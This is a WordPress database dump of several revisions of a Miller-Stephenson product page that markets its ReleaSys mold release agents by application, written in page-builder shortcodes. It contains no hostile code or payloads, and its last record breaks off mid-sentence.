INSERT INTO `wp_posts` VALUES (4394, 3, '2017-06-01 16:24:23', '2017-06-01 16:24:23', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="95" scale="79" padding="5px 30px 10px 30px" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.Products for this applicationneed to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.</p>\n[button text="ReleaSys™ 8900 & 9900"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizesan ever-widening variety of thermoplastic resins.In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolreance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application</p>\n[button text="ReleaSys™ RM"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants polyurethane can be molded (High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands of a release agent very high.Miller-Stephenson’s <b>ReleaSys™</b> release systems has specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenacious to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass provide critical protection to your mold surface and highly effective release properties.</p>\n[button text="ReleaSys™ 8800"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and all other elastomers,Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years.Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers the ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding, however regardless of the substrate critical performance criteria exist for all mold release used: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers most durable, highest performing mold release agents to the aerospace and fiberglass industry. Our products provide multiple releases, critical tooling protection, and no transfer from only a single coat.No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you. </p>\n[button text="ReleaSys™ 9900"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns.  Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-01 16:24:23', '2017-06-01 16:24:23', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4395, 3, '2017-06-01 16:26:29', '2017-06-01 16:26:29', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="95" scale="79" padding="5px 30px 10px 30px" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\nMiller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Advanced Composites</h2>\r\nModern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.Products for this applicationneed to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.\r\n\r\n[button text="ReleaSys™ 8900 &amp; 9900"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\nRotational Molding is a dynamic industry which utilizesan ever-widening variety of thermoplastic resins.In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolreance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application\r\n\r\n[button text="ReleaSys™ RM"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Polyurethane-TPU</h2>\r\nMiller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants polyurethane can be molded (High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands of a release agent very high.Miller-Stephenson’s <b>ReleaSys™</b> release systems has specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenacious to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass provide critical protection to your mold surface and highly effective release properties.\r\n\r\n[button text="ReleaSys™ 8800"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\nFrom Fluorosilicones to EPDM, Natural Rubber to Nitrile, and all other elastomers,Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years.Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers the ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.\r\n\r\n[button text="ReleaSys™ 8200"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Injection Plastics Mold Release</h2>\r\nThere are numerous resins used in plastic injection molding, however regardless of the substrate critical performance criteria exist for all mold release used: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.\r\n\r\n[button text="ReleaSys™ 9800"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Fiberglass Mold Release</h2>\r\nMiller-Stephenson delivers most durable, highest performing mold release agents to the aerospace and fiberglass industry. Our products provide multiple releases, critical tooling protection, and no transfer from only a single coat.No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.\r\n\r\n[button text="ReleaSys™ 9900"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Pre-Cast / Reinformed Concrete</h2>\r\nMiller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..\r\n\r\n[button text="ReleaSys™ CR"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider]\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-01 16:26:29', '2017-06-01 16:26:29', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4396, 3, '2017-06-01 16:29:28', '2017-06-01 16:29:28', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)" hover="glow" effect="sparkle"]\n\n[text_box text_color="dark" hover="fade-out" width="95" scale="79" padding="5px 30px 10px 30px" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.Products for this applicationneed to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.</p>\n[button text="ReleaSys™ 8900 & 9900"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizesan ever-widening variety of thermoplastic resins.In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolreance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application</p>\n[button text="ReleaSys™ RM"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants polyurethane can be molded (High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands of a release agent very high.Miller-Stephenson’s <b>ReleaSys™</b> release systems has specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenacious to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass provide critical protection to your mold surface and highly effective release properties.</p>\n[button text="ReleaSys™ 8800"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and all other elastomers,Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years.Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers the ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding, however regardless of the substrate critical performance criteria exist for all mold release used: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers most durable, highest performing mold release agents to the aerospace and fiberglass industry. Our products provide multiple releases, critical tooling protection, and no transfer from only a single coat.No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\n[button text="ReleaSys™ 9900"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast / Reinformed Concrete</h2>\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\n[button text="ReleaSys™ CR"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-01 16:29:28', '2017-06-01 16:29:28', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4397, 2, '2017-06-01 16:34:37', '2017-06-01 16:34:37', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)" hover="glow" effect="sparkle"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="95" scale="79" padding="5px 30px 10px 30px" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\nMiller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.\r\n\r\n[/text_box]\r\n<p style="text-align: left;">[/ux_banner]</p>\r\n<p style="text-align: center;">\r\n[divider]</p>\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Advanced Composites</h2>\r\nModern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.Products for this applicationneed to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.\r\n\r\n[button text="ReleaSys™ 8900 &amp; 9900"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n<p style="text-align: center;">\r\n[divider]</p>\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\nRotational Molding is a dynamic industry which utilizesan ever-widening variety of thermoplastic resins.In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolreance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application\r\n\r\n[button text="ReleaSys™ RM"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n<p style="text-align: center;">\r\n[divider]</p>\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Polyurethane-TPU</h2>\r\nMiller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants polyurethane can be molded (High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands of a release agent very high.Miller-Stephenson’s <b>ReleaSys™</b> release systems has specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenacious to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass provide critical protection to your mold surface and highly effective release properties.\r\n\r\n[button text="ReleaSys™ 8800"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n<p style="text-align: center;">\r\n[divider]</p>\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\nFrom Fluorosilicones to EPDM, Natural Rubber to Nitrile, and all other elastomers,Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years.Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers the ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.\r\n\r\n[button text="ReleaSys™ 8200"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n<p style="text-align: center;">\r\n[divider]</p>\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Injection Plastics Mold Release</h2>\r\nThere are numerous resins used in plastic injection molding, however regardless of the substrate critical performance criteria exist for all mold release used: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.\r\n\r\n[button text="ReleaSys™ 9800"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n<p style="text-align: center;">\r\n[divider]</p>\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Fiberglass Mold Release</h2>\r\nMiller-Stephenson delivers most durable, highest performing mold release agents to the aerospace and fiberglass industry. Our products provide multiple releases, critical tooling protection, and no transfer from only a single coat.No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.\r\n\r\n[button text="ReleaSys™ 9900"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n<p style="text-align: center;">\r\n[divider]</p>\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n<h2>Pre-Cast / Reinformed Concrete</h2>\r\nMiller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..\r\n\r\n[button text="ReleaSys™ CR"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n<p style="text-align: center;">\r\n[divider]</p>\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-01 16:34:37', '2017-06-01 16:34:37', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4398, 3, '2017-06-01 16:36:20', '2017-06-01 16:36:20', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)" hover="glow" effect="sparkle"]\n\n[text_box text_color="dark" hover="fade-out" width="95" scale="79" padding="5px 30px 10px 30px" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.Products for this applicationneed to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.</p>\n[button text="ReleaSys™ 8900 & 9900"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins.In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolreance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application</p>\n[button text="ReleaSys™ RM"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane  (High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface and highly effective release properties.</p>\n[button text="ReleaSys™ 8800"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, 